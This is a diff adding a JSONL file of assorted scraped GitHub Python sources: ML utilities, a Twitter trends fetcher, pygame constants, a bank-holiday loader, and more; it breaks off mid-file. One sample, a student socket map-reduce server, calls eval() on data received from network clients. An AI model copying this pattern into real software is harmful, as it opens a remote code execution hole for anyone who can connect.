diff --git "a/835.jsonl" "b/835.jsonl" new file mode 100644--- /dev/null +++ "b/835.jsonl" @@ -0,0 +1,1760 @@ +{"seq_id":"2300416612","text":"import os\n\nimport torch\nimport torch.optim as optim\n\nfrom utils import load_checkpoint\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef get_optimizer(P, model):\n params = model.parameters()\n optimizer = optim.Adam(params, lr=P.lr)\n return optimizer\n\n\ndef is_resume(P, model, optimizer):\n if P.resume_path is not None:\n model_state, optim_state, config, lr_dict, ema_dict = load_checkpoint(P.resume_path, mode='last')\n model.load_state_dict(model_state, strict=not P.no_strict)\n optimizer.load_state_dict(optim_state)\n start_step = config['step']\n best = config['best']\n is_best = False\n acc = 0.0\n if lr_dict is not None:\n P.inner_lr = lr_dict\n if ema_dict is not None:\n P.moving_average = ema_dict\n else:\n is_best = False\n start_step = 1\n best = -100.0\n acc = 0.0\n return is_best, start_step, best, acc\n\n\ndef load_model(P, model, logger=None):\n if logger is None:\n log_ = print\n else:\n log_ = logger.log\n\n if P.load_path is not None:\n log_(f'Load model from {P.load_path}')\n checkpoint = torch.load(P.load_path)\n if P.rank != 0:\n model.__init_low_rank__(rank=P.rank)\n\n model.load_state_dict(checkpoint, strict=P.no_strict)\n","repo_name":"jaehyun513/STUNT","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"20014999900","text":"from tweepy import OAuthHandler\nfrom tweepy import API\nimport datetime\nimport DB_writer\nimport os\n\napi_key = os.environ['twitter_api_key']\napi_secret = os.environ['twitter_api_secret']\naccess_token = os.environ['twitter_access_token']\naccess_secret = os.environ['twitter_access_secret']\n\ndef get_trends():\n # Consumer key authentication(consumer_key,consumer_secret can be collected from our twitter developer profile)\n auth = OAuthHandler(api_key, api_secret)\n\n # Access key authentication(access_token,access_token_secret can be collected from our twitter developer profile)\n auth.set_access_token(access_token, access_secret)\n\n # Set up the API with the authentication handler\n api = API(auth)\n\n # Germany WOEID\n woeid = 23424829\n\n # Get trends\n trends = api.trends_place(woeid)\n trends = trends[0]['trends']\n now = datetime.datetime.now()\n trends = [{\"keyword\": t['name'], \"volume\": t['tweet_volume'], \"tmstmp\": now} for t in trends]\n\n for t in trends:\n DB_writer.insert_trends(t)","repo_name":"henrythier/news","sub_path":"twittertrends.py","file_name":"twittertrends.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30455818013","text":"import pygame\n#Contains variables\n#Dimensions\nCELL_SIZE = 40\nCELL_NO_X = 20\nCELL_NO_Y = 20\nSMALL_FONT_SIZE = 25\nBIG_FONT_SIZE = 60\n\n#Direction\nMOVE_UP = \"up\"\nMOVE_DOWN = \"down\"\nMOVE_LEFT = \"left\"\nMOVE_RIGHT = \"right\"\n\n#Color\nBOARD_COLOR_BASE = (175, 215, 70)\nGRASS_COLOR = (167, 209, 61)\nSCORE_COLOR = (56, 74, 12)\nFONT_COLOR = (56, 74, 12)\n\n#Game specific constants\nFULL_BOARD = (CELL_NO_X * CELL_NO_Y) - 1 #just before the snake eats the last fruit, this is the snake's length\n\n#pygame specific constants\nBOARD_UPDATE_EVENT = pygame.USEREVENT\nMOVEMENT_MS_PER_EVENT = 150","repo_name":"theAwesomeElmar/pygame-snake-practice","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37710928178","text":"from setuptools import setup, find_packages\n\nwith open(\"README.rst\", \"r\") as fh:\n long_description = fh.read()\n\n# Get the version.\nversion = {}\nwith open(\"pastas/version.py\") as fp:\n exec(fp.read(), version)\n\nsetup(\n name='pastas',\n version=version['__version__'],\n description='Python Applied System TimeSeries Analysis Software',\n long_description=long_description,\n long_description_content_type=\"text/x-rst\",\n url='https://github.com/pastas/pastas',\n author='R.A. Collenteur, M. Bakker, R. Calje, F. Schaars',\n author_email='raoulcollenteur@gmail.com, markbak@gmail.com, '\n 'r.calje@artesia-water.nl',\n project_urls={\n 'Source': 'https://github.com/pastas/pastas',\n 'Documentation': 'http://pastas.readthedocs.io/en/latest/',\n 'Tracker': 'https://github.com/pastas/pastas/issues',\n 'Help': 'https://stackoverflow.com/questions/tagged/pastas'\n },\n license='MIT',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Other Audience',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6'\n ],\n platforms='Windows, Mac OS-X',\n install_requires=['numpy>=1.10', 'matplotlib>=1.5', 'pandas>=0.22',\n 'scipy>=1.0'],\n packages=find_packages(exclude=[]),\n package_data={\"pastas\": [\"log_config.json\"], },\n)\n","repo_name":"kbSSR/pastas","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"19201463341","text":"from PIL import Image\nimport numpy as np \nfrom matplotlib import pyplot as plt\n\nimg = Image.open(\"/path/to/file/image.tif\")\n\nr, g, b = img.split()\n\nhist_r = np.array(r.histogram())\nhist_r[:5] = hist_r[10] # :5 for the thredshold can be changed according to the need \nhist_g = np.array(g.histogram())\nhist_g[:5] = hist_g[10]\nhist_b = np.array(b.histogram())\nhist_b[:5] = hist_b[10]\nplt.plot((hist_r+hist_g),color = 'y')\nplt.plot(hist_r,color = 'r')\nplt.plot(hist_g,color = 'g')\nplt.plot(hist_b,color = 'b')\nplt.xlim([0,256])\nplt.show()\n\nRed = np.array(r)>100\nplt.imshow(Red)\n","repo_name":"BNMEZR/immunofluorescence_data","sub_path":"Histogram.py","file_name":"Histogram.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41866114829","text":"import pygame\nimport Texture\nimport math\n\n\ndef mip_map(texture, mips):\n for i in range(0, mips):\n surf = texture.texture\n a = int(surf.get_width()/2.0)\n b = int(surf.get_height()/2.0)\n surf.unlock()\n surf = pygame.transform.smoothscale(surf, (a, b))\n texture.texture = surf\n return texture\n","repo_name":"FelixWindisch/PyRayT","sub_path":"MipMap.py","file_name":"MipMap.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"14020092800","text":"from math import log10\nimport csv\n\ndef file2list(file):\n\tf = open(file,\"r\")\n\tdata = list()\n\tnext(f)\n\tfor line in f:\n\t\tline = line.strip(\"\\n\")\n\t\tl = line.split(\",\")\n\t\tdata.append(l)\n\treturn data\n\n\ndef psrcalc(file, nmin = 0, R = 0):\n\tdata = file2list(file)\n\n\tl = 0\n\tfor iter0 in data:\n\t\tif iter0[1] != \"diseases\":\n\t\t\tl += 1\n\n\tpsrdata = [[None] * 4] * l\n\tpara = [[None] * 6] * l\n\t\n\tk = 0\n\tfor iter1 in data:\n\t\tprobability = 0\n\t\tspecificity = 0\n\t\tif iter1[1] != \"diseases\":\n\n\t\t\tnco0 = int(iter1[3]) #Co occurence number\n\t\t\tnco1 = 0 #Total co occurence number\n\t\t\tctr0 = 0 #Occurence Number\n\t\t\tctr1 = 0 #Total occurence Number\n\n\t\t\tfor iter2 in data:\n\t\t\t\tif iter1[1] == iter2[1]:\n\t\t\t\t\tif iter1[0] == iter2[0]:\n\t\t\t\t\t\tctr0 += int(iter2[3])\n\t\t\t\t\tctr1 += int(iter2[3])\n\t\t\t\t\tif iter1[2] == iter2[2]:\n\t\t\t\t\t\tnco1 += int(iter2[3])\n\t\t\tprobability = nco0/ctr0\n\t\t\tspecificity = probability/(nco1/ctr1)\n\t\t\treliability = log10(max(1,1+nco0-nmin)) + R\n\t\t\tpsr = probability * specificity * reliability\n\n\t\t\t#Insert code for if it's diseases\n\t\t\tpara[k] = iter1\n\t\t\tpara[k].extend([psr, probability,specificity,reliability])\n\n\t\t\tpsrdata[k] = iter1[0:3] + iter1[4:5]\n\t\t\tk += 1\n\treturn psrdata, para\n\ndef postprocess(predata,psrcutoff = 0.22):\n\n\tpostdata = list()\n\n\tfor i in range(len(predata)):\n\t\tif predata[i][3] > psrcutoff:\n\t\t\tpostdata.append(predata[i])\n\t\t\t#predata[i].pop()\n\n\tprint(len(postdata),len(predata),sep = \",\")\n\treturn postdata\n\ndef data2file(data,file):\n\theaders = [\"sb\",\"pr\",\"ob\",\"wt\"] #Subject,Predicate,Object,Weight\n\n\twith open(file,\"w\") as file:\n\t\tW = csv.writer(file)\n\t\tW.writerow(headers)\n\t\tW.writerows(data)\n\npsr, para = psrcalc(\"data-5m.csv\", nmin = 5, R = 1)\nfinalpsr = postprocess(psr)\n\ndata2file(finalpsr,\"psrdata.csv\")","repo_name":"snehasaisneha/hkgpipeline","sub_path":"prelim_pipeline/psr_calc.py","file_name":"psr_calc.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73652333586","text":"def formatter(msg):\r\n\tif type(msg) is not bool:\r\n\t\tsmsg = msg.split(' :', 1)\r\n\t\tif len(smsg) == 2:\r\n\t\t\tnmsg = f'{smsg[0]}: {smsg[1]}'\r\n\t\t\treturn nmsg\r\n\t\treturn(msg)\r\n\telse:\r\n\t\treturn False\r\n\r\ndef formatterCmd(msg):\r\n\tdata = formatter(msg).split(': ') if type(msg) is not bool else False\r\n\t\r\n\tresponse = ''\r\n\r\n\tif type(data) == bool:\r\n\t\tresponse = {\r\n\t\t\t'user': 'bool',\r\n\t\t\t'method': 'error',\r\n\t\t\t'command': '',\r\n\t\t\t'message': '',\r\n\t\t\t'enabled': 'false'\r\n\t\t\t}\r\n\telif len(data) == 2 and not False:\r\n\t\tusr = data[0]\r\n\t\tres = data[1].split(' ', 1) if len(data) >= 1 else ['None', 'None']\r\n\t\tcmd = res[0]\r\n\t\texe = res[1] if len(res) > 1 else 'this is a message'\r\n\t\t#print(f'\"{usr}\" used the \"{cmd}\" command and got the \"{exe}\" response')\r\n\r\n\r\n\r\n\t\tif cmd[0] == '!':\r\n\t\t\tresponse = {\r\n\t\t\t\t\"user\": usr,\r\n\t\t\t\t\"method\": \"read\",\r\n\t\t\t\t\"command\": cmd,\r\n\t\t\t\t\"message\": \"reading command\",\r\n\t\t\t\t\"enabled\": True\r\n\t\t\t\t}\r\n\t\t\tif cmd == '!register':\r\n\t\t\t\tresponse = {\r\n\t\t\t\t\t\"user\": usr,\r\n\t\t\t\t\t\"method\": \"write\",\r\n\t\t\t\t\t\"command\": exe.split(' ', 1)[0],\r\n\t\t\t\t\t\"message\": exe.split(' ', 1)[1],\r\n\t\t\t\t\t\"enabled\": True\r\n\t\t\t\t\t}\r\n\t\telse:\r\n\t\t\tresponse = False\r\n\t\t\r\n\treturn response","repo_name":"vmdeom/xutasBot","sub_path":"formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42114883201","text":"import collections\nimport datetime\nimport json\n\nimport requests\n\nfrom nextbus import models\nfrom nextbus.populate import utils\n\n\nBANK_HOLIDAY_URL = r\"https://www.gov.uk/bank-holidays.json\"\nHOLIDAYS = [\n {\"holiday_id\": 1, \"name\": \"new year’s day\", \"region\": None, \"note\": None},\n {\"holiday_id\": 2, \"name\": \"2nd january\", \"region\": \"scotland\", \"note\": None},\n {\"holiday_id\": 3, \"name\": \"good friday\", \"region\": None, \"note\": None},\n {\"holiday_id\": 4, \"name\": \"easter monday\", \"region\": None, \"note\": None},\n {\"holiday_id\": 5, \"name\": \"early may bank holiday\", \"region\": None, \"note\": None},\n {\"holiday_id\": 6, \"name\": \"spring bank holiday\", \"region\": None, \"note\": None},\n {\"holiday_id\": 7, \"name\": \"summer bank holiday\", \"region\": \"england-and-wales\", \"note\": None},\n {\"holiday_id\": 8, \"name\": \"summer bank holiday\", \"region\": \"scotland\", \"note\": None},\n {\"holiday_id\": 9, \"name\": \"christmas day\", \"region\": None, \"note\": None},\n {\"holiday_id\": 10, \"name\": \"boxing day\", \"region\": None, \"note\": None},\n {\"holiday_id\": 11, \"name\": \"christmas day\", \"region\": None, \"note\": \"substitute day\"},\n {\"holiday_id\": 12, \"name\": \"boxing day\", \"region\": None, \"note\": \"substitute day\"},\n {\"holiday_id\": 13, \"name\": \"new year’s day\", \"region\": None, \"note\": \"substitute day\"},\n]\n\n\nHolidayDate = collections.namedtuple(\"HolidayDate\", (\"id\", \"date\"))\n\n\ndef _get_holiday_dates(data):\n try:\n divisions = data.values()\n except AttributeError:\n raise ValueError(\"The given data is not an object\")\n\n holiday_dates = set()\n for division in divisions:\n region = _get_property(division, \"division\")\n events = _get_property(division, \"events\")\n for event in events:\n holiday_date = _get_holiday(region, event)\n if holiday_date is not None:\n holiday_dates.add(holiday_date)\n\n years = set()\n for bh in holiday_dates:\n years.add(bh.date.year)\n\n for year in years:\n # The API provides bank holidays that will have been substituted if the\n # occasion (eg New Year's Day) fell on a weekend. Bus timetables will\n # require both dates so they will need to be infilled as well.\n holiday_dates.add(HolidayDate(1, datetime.date(year, 1, 1)))\n holiday_dates.add(HolidayDate(14, datetime.date(year, 12, 24)))\n holiday_dates.add(HolidayDate(9, datetime.date(year, 12, 25)))\n holiday_dates.add(HolidayDate(10, datetime.date(year, 12, 26)))\n holiday_dates.add(HolidayDate(15, datetime.date(year, 12, 31)))\n\n return holiday_dates\n\n\ndef _get_holiday(region, event):\n title = _get_property(event, \"title\").lower()\n notes = _get_property(event, \"notes\").lower()\n\n # Match the substitute days first so check in reverse order\n for match in reversed(HOLIDAYS):\n if (\n match[\"name\"] in title and\n (match[\"region\"] is None or match[\"region\"] == region) and\n (match[\"note\"] is None or match[\"note\"] in notes)\n ):\n break\n else:\n # No matches found\n return None\n\n date = _get_property(event, \"date\")\n try:\n dt = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n except (ValueError, TypeError) as e:\n raise ValueError(\n f\"Invalid date for bank holiday {event['title']}\"\n ) from e\n\n return HolidayDate(match[\"holiday_id\"], dt.date())\n\n\ndef _get_property(obj, name):\n try:\n return obj[name]\n except TypeError as e:\n raise ValueError(f\"Expected an object\") from e\n except KeyError as e:\n raise ValueError(f\"Expected {name!r} property in object\") from e\n\n\ndef populate_holiday_data(connection, path=None):\n \"\"\" Retrieve and convert bank holiday data from the GOV.UK API and load them\n into the database.\n :param connection: Database connection for population.\n :param path: Path to JSON file. If this is None it will be downloaded.\n \"\"\"\n if path is not None:\n utils.logger.info(f\"Opening JSON file at {path!r}\")\n with open(path, \"r\") as f:\n data = json.load(f)\n else:\n utils.logger.info(f\"Downloading JSON data from {BANK_HOLIDAY_URL!r}\")\n data = requests.get(BANK_HOLIDAY_URL).json()\n\n try:\n holiday_dates = _get_holiday_dates(data)\n except ValueError as e:\n # Log error and exit; leave any existing bank holiday data alone\n utils.logger.error(f\"Failed to transform bank holiday data\", exc_info=e)\n return\n\n # Convert the holiday date data to rows and insert them\n rows = []\n for holiday_date in holiday_dates:\n rows.append({\n \"holiday_ref\": holiday_date.id,\n \"date\": holiday_date.date,\n })\n\n table = models.BankHolidayDate.__table__\n connection.execute(table.delete())\n connection.execute(table.insert().values(rows))\n utils.logger.info(\"Bank holiday date population done\")\n","repo_name":"macph/nextbus","sub_path":"src/nextbus/populate/holidays.py","file_name":"holidays.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12728634625","text":"import logging\nimport os\n\nfrom server import Server\n\nserver = Server()\nenv_config = server.create_config()\n\napp = server.create_app(config=env_config)\ngunicorn_logger = logging.getLogger(\"gunicorn.error\")\napp.logger.handlers = gunicorn_logger.handlers\napp.logger.setLevel(gunicorn_logger.level)\napp.run(host=\"0.0.0.0\", debug=True, port=8080)\n","repo_name":"reyvb24/Aws-Hackathon","sub_path":"botelle/botelle_backend/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1102258337","text":"from time import sleep\nfrom vue.shared.infrastructure.factories.driver_factory import get_chrome, close\nfrom vue.shared.infrastructure.facades.dom import Dom\nfrom vue.shared.infrastructure.facades.dropdown import Dropdown\nfrom vue.shared.infrastructure.facades.element import Element\nfrom vue.shared.infrastructure.generators.uuid import get_uuid\nfrom vue.shared.infrastructure.repositories.routes_repository import RoutesRepository\n\nfrom vue.shared.domain.element_enum import ElementEnum\nfrom vue.oco.login.application.login_service import login_usr1_or_fail\nfrom vue.oco.assets.infrastructure.repositories.assets_repository import AssetsRepository\nfrom vue.oco.assets.infrastructure.repositories.asset_material_attributes_repository import \\\n AssetMaterialAttributesRepository\n\n\ndef asset_create_product() -> None:\n login_usr1_or_fail()\n sleep(30)\n\n browser = get_chrome()\n browser.get(RoutesRepository.get_asset_add_url())\n dom = Dom(browser)\n sleep(3)\n\n __config_asset_type(dom)\n\n btn_id = AssetsRepository.get_id_button_save()\n btn_save = dom.find_by_id(btn_id)\n btn_save.click()\n close(30)\n\n\ndef __config_asset_type(dom: Dom) -> None:\n el = Element(dom)\n element_id = AssetsRepository.get_id_asset_code()\n uuid = get_uuid(4)\n value = f\"prd-{uuid}\"\n el.set_value(element_id, value)\n\n element_id = AssetsRepository.get_id_asset_name()\n value = f\"prd-{uuid}\"\n el.set_value(element_id, value)\n\n dd = Dropdown(dom)\n # tipo de asset\n btn_xpath = AssetMaterialAttributesRepository.get_sel_asset_type_product()\n li_xpath = AssetMaterialAttributesRepository.get_sel_asset_type_product(ElementEnum.LI_XPATH)\n dd.select_by_xpath(btn_xpath, li_xpath)\n","repo_name":"eacevedof/prj_python37","sub_path":"selenium/vue/oco/assets/application/asset_create_product_service.py","file_name":"asset_create_product_service.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"31471050852","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nclass IrisDataset:\n def __init__(self, dataset_path: str = \"dataset/iris.csv\") -> None:\n self.df = pd.read_csv(dataset_path,index_col=0)\n\n self.train, self.test = train_test_split(\n self.df, test_size=0.25, random_state=12345\n )\n","repo_name":"alphinside/example-dvc-dataset","sub_path":"example_dvc_dataset/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24429731120","text":"\"\"\"\nCASSANDRA CHAPUT\n2/21/2023\nCSCI-P434\nASSIGNMENT 2\n\nSERVER.PY\n\"\"\"\n\n\n\n#IMPORT STATEMENTS\nimport socket\n\n#GLOBAL DICTIONARY & LIST\nwc_list = []\nreduced_dict = {}\n\n# FUNCTION TO GET DATA FROM SOCKET\n# PARAMETER: SOCK(CONNECTION OF CLIENT)\n# RETURN DATA SENT BY CLIENT\ndef recvall(sock):\n BUFF_SIZE = 10 #1 KiB\n data = b''\n while True:\n chunk = sock.recv(BUFF_SIZE)\n data += chunk\n if len(chunk) < BUFF_SIZE:\n #EITHER 0 OR EOD\n break\n return data\n\n# FUNCTION TO MAP WORDCOUNT OF FILE\ndef map_wc(doc_id):\n wc_list.clear()\n with open(doc_id, 'r') as doc:\n for line in doc: \n line.strip()\n #print(\"LINE: \", line)\n for word in list(line.split(\" \")): \n word = word.lower()\n word = word.replace(\",\", \"\")\n word = word.replace(\".\", \"\")\n word = word.replace(\";\", \"\")\n word = word.replace(\"!\", \"\")\n word = word.replace(\"?\", \"\")\n tup = tuple((word.strip(), 1))\n wc_list.append(tup)\n #print(\"WORD: \", word)\n conn.sendall(f\"{wc_list}\".encode())\n return wc_list\n\ndef set(dictionary, key, value):\n if key in dictionary.keys():\n dictionary[key] = dictionary[key]+value\n else:\n dictionary[key] = value\n return dictionary\n\n# FUNCTION TO REDUCE \ndef run_mapred(input_data, output_location):\n reduced_dict.clear()\n res = eval(input_data)\n for t in res:\n #print(t)\n #print(type(t))\n set(reduced_dict, t[0], t[1])\n \n # CREATE OUTPUT FILE\n text = str(list(reduced_dict.items()))\n output_file = open(output_location, 'w')\n output_file.write(text)\n output_file.close()\n\n conn.sendall(f\"{reduced_dict}\".encode())\n return reduced_dict\n\n# FUNCTION FOR INVERT INDEX\ndef invert_index(file_list, output_location):\n mult_file_wc = {}\n for file_name in file_list:\n f = open(file_name, 'r').read()\n wc = eval(f)\n for item in wc:\n mult_file_wc = set(mult_file_wc, item[0], item[1])\n \n # CREATE OUTPUT FILE\n output_file = open(output_location, 'w')\n text = str(list(mult_file_wc.items()))\n output_file.write(text)\n output_file.close()\n\n conn.sendall(f\"{mult_file_wc}\".encode())\n return mult_file_wc\n\n\nif __name__ == '__main__':\n #DEFINE SERVER ADDRESS\n HOST = \"127.0.0.1\"\n PORT = 9889\n\n #DEFINE CMD, KEY & VALUE\n cmd = ''\n key =''\n value = ''\n\n #BIND SERVER TO ADDY AND LISTEN FOR CLIENT\n s = socket.socket()\n s.bind((HOST, PORT))\n s.listen()\n\n while True:\n conn, addr = s.accept()\n print(f\"CONNECTED BY {addr}\")\n\n #GET DATA FROM CLIENT\n #data = conn.recv(1024)\n data = recvall(conn)\n\n #PRINT RECIEVED DATA\n print(f\"ADDRESS {addr} \\n CMD: {data.decode()}\")\n\n #DETERMIND CMD & KEY\n l = list(data.decode().split(\": \"))\n cmd = l[0]\n\n # SET KEY VALUE IN FUNC SET()\n if cmd == \"map_wc\":\n map_wc(l[1])\n elif cmd == \"run_mapred\":\n l1 = list(l[1].split(\" OUTPUT_LOCATION:\"))\n input_data = l1[0]\n #print(\"TYPE OF INPUT_DATA IS \", type(input_data))\n output_location = l1[1] \n run_mapred(input_data, output_location)\n elif cmd == \"invert_index\":\n l1 = list(l[1].split(\" OUTPUT_LOCATION:\"))\n output_location = l1[1]\n file_list = list(l1[0].split(\" \"))\n #print(f\"\\nFILE LIST:{file_list[0]} {file_list[1]} {file_list[2]}\\n\\n\")\n file_dict = {}\n for f in file_list:\n file_dict[f] = None\n invert_index(file_dict, output_location)\n\n","repo_name":"chaput200/P434","sub_path":"DS_A2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25519611459","text":"# 스파이들은 매일 다른 옷을 조합하여 입어 자신을 위장합니다.\n#\n# 예를 들어 스파이가 가진 옷이 아래와 같고 오늘 스파이가 동그란 안경, 긴 코트, 파란색 티셔츠를 입었다면\n# 다음날은 청바지를 추가로 입거나 동그란 안경 대신 검정 선글라스를 착용하거나 해야 합니다.\n# 종류 \t이름\n# 얼굴 \t동그란 안경, 검정 선글라스\n# 상의 \t파란색 티셔츠\n# 하의 \t청바지\n# 겉옷 \t긴 코트\n#\n# 스파이가 가진 의상들이 담긴 2차원 배열 clothes가 주어질 때 서로 다른 옷의 조합의 수를 return 하도록 solution 함수를 작성해주세요.\n# 제한사항\n#\n# clothes의 각 행은 [의상의 이름, 의상의 종류]로 이루어져 있습니다.\n# 스파이가 가진 의상의 수는 1개 이상 30개 이하입니다.\n# 같은 이름을 가진 의상은 존재하지 않습니다.\n# clothes의 모든 원소는 문자열로 이루어져 있습니다.\n# 모든 문자열의 길이는 1 이상 20 이하인 자연수이고 알파벳 소문자 또는 '_' 로만 이루어져 있습니다.\n# 스파이는 하루에 최소 한 개의 의상은 입습니다.\n\n# 의상이름-key, 의상종류-value로 딕셔너리 생성\ndef first_solution(clothes):\n # dict_cloths = {}\n # answer = 0\n # 딕셔너리 안쓰고 그대로\n # for i, cloth in enumerate(clothes):\n # dict_cloths[i] = cloth[1]\n\n cloths_number = len(clothes)\n cloth_combination = []\n\n for i in range(1 << cloths_number):\n comb_temp = []\n kind_temp = []\n for j in range(cloths_number):\n if i & (1 << j):\n if clothes[j][1] not in kind_temp:\n kind_temp.append(clothes[j][1])\n comb_temp.append(j)\n\n if comb_temp not in cloth_combination:\n cloth_combination.append(comb_temp)\n\n print(cloth_combination)\n cloth_combination.pop(0)\n answer = len(cloth_combination)\n\n return answer\n\n # for comb in cloth_combination:\n # cnt = Counter(comb)\n # max_value = max(list(cnt.values()))\n # if max_value >= 2:\n # answer -= 1\n\ndef solution(clothes): # best solution\n # 옷의 종류별로 (옷종류갯수+벗은상황)*(옷종류갯수+벗은상황1)*... - 1(아무것도 안입었을때\n # 종류(키): 옷(벨류) 로 딕셔너리 생성\n # 각 딕셔너리 항목별 갯수+1을 다 곱해주고 마지막에 - 1\n answer = 1\n dic = {}\n for cloth, ctype in clothes:\n if not dic.get(ctype):\n dic[ctype] = [cloth]\n else:\n dic[ctype].append(cloth)\n\n for c_type in dic:\n answer *= len(dic[c_type]) + 1\n\n return answer - 1\n\n\n\np_list = [[\"yellowhat\", \"headgear\"], [\"bluesunglasses\", \"eyewear\"], [\"green_turban\", \"headgear\"]]\n\nprint(solution(p_list))\n\n\ndef best_solution(clothes):\n from collections import Counter\n from functools import reduce # reduce(집계함수, 순회가능 데이터,[,초기값]) 집계함수는 lambda 누적자(x,y): 집계함수(x*(y+1)), 순회데이터, 초기값) 형태\n cnt = Counter([kind for name, kind in clothes])\n answer = reduce(lambda x, y: x*(y+1), cnt.values(), 1) - 1\n return answer","repo_name":"Enin/codingTest","sub_path":"Programmers/Hash/P3_spy.py","file_name":"P3_spy.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20564276523","text":"#!/usr/bin/python2\n\nusage='''\n Usage: python lenDist.py [--image] /path/to/sample_output_directory\n\n Output saved as lenDist.csv, and possibly lenDistHistograme.png\n\n Description:\n Calculates the read length distribution post-trimming across all samples.\n If the --image flag is provided, will out put a read length histogram for\n each sample. For small RNA-seq, we expect to see a peak around 21-22, as\n these are the miRNAs.\n\n'''\n \n\nimport sys\nimport argparse\nimport os\nimport f_utils\n\n\ndef read_lengths_dict(samples):\n '''\n Load the length distribution data into a dictionary\n '''\n out_di = {}\n lengths = {}\n for file in samples:\n with open(file, 'r') as fi:\n name = fi.readline().rstrip().split('\\t')[1]\n out_di[name] = {}\n for l in fi:\n a, b = l.rstrip().split('\\t')\n out_di[name][a] = b\n lengths[a] = 1\n return out_di, sorted(lengths)\n\n\ndef write_length_distribution(outPath, len_di, lengths):\n '''\n Calculate read length ratio and write to output fore each sample\n '''\n output_name = '{}{}'.format(outPath, 'length_distribution.csv')\n with open(output_name, \"w\") as f:\n f.write('Length,{}\\n'.format(','.join(sorted(len_di))))\n for len in lengths:\n f.write(len)\n for sample in sorted(len_di):\n try:\n f.write(',{}'.format(len_di[sample][len]))\n except KeyError:\n f.write(',0')\n f.write('\\n')\n return output_name\n\n\ndef create_length_dist_image(out_dir, out_name):\n '''\n Using R, creates a length distribution image for each sample\n '''\n os.system('Rscript --vanilla {}/lenDistGraph.R {}'.format(out_dir, out_name))\n \n\ndef main(outPath, samples):\n samples = f_utils.set_path_to_files_glob(samples, 'ead_length_histo')\n len_di, lengths = read_lengths_dict(samples)\n out_name = write_length_distribution(outPath, len_di, lengths)\n create_length_dist_image(os.path.dirname(__file__), out_name)\n\n\nif __name__ == '__main__':\n f_utils.check_for_input(sys.argv, usage)\n parser = argparse.ArgumentParser(\n description='Analyzed the length distribution of trimmed reads')\n parser.add_argument(\n 'outPath', \n action='store', \n help='Path to where the output file will be located')\n parser.add_argument(\n 'samples', \n action='store', \n nargs='+',\n help='Path to where the sample output folders are located')\n arg = parser.parse_args()\n main(arg.outPath, arg.samples)\n","repo_name":"Sethupathy-Lab/miRquant","sub_path":"bin/final_analysis/lenDist.py","file_name":"lenDist.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"10793475606","text":"import logging\nfrom typing import Any, Dict, Mapping, Optional, Union\n\nimport great_expectations.exceptions as ge_exceptions\nfrom great_expectations.core import ExpectationSuite\nfrom great_expectations.data_context.data_context.abstract_data_context import (\n AbstractDataContext,\n)\nfrom great_expectations.data_context.data_context_variables import (\n EphemeralDataContextVariables,\n)\nfrom great_expectations.data_context.types.base import DataContextConfig\nfrom great_expectations.data_context.types.resource_identifiers import (\n ExpectationSuiteIdentifier,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass EphemeralDataContext(AbstractDataContext):\n \"\"\"\n Will contain functionality to create DataContext at runtime (ie. passed in config object or from stores). Users will\n be able to use EphemeralDataContext for having a temporary or in-memory DataContext\n\n TODO: Most of the BaseDataContext code will be migrated to this class, which will continue to exist for backwards\n compatibility reasons.\n \"\"\"\n\n def __init__(\n self,\n project_config: Union[DataContextConfig, Mapping],\n runtime_environment: Optional[dict] = None,\n ) -> None:\n \"\"\"EphemeralDataContext constructor\n\n project_config: config for in-memory EphemeralDataContext\n runtime_environment: a dictionary of config variables tha\n override both those set in config_variables.yml and the environment\n\n \"\"\"\n self._project_config = self._apply_global_config_overrides(\n config=project_config\n )\n self._config_variables = self._load_config_variables()\n self._variables = self._init_variables()\n super().__init__(runtime_environment=runtime_environment)\n\n def _init_variables(self) -> EphemeralDataContextVariables:\n variables: EphemeralDataContextVariables = EphemeralDataContextVariables(\n 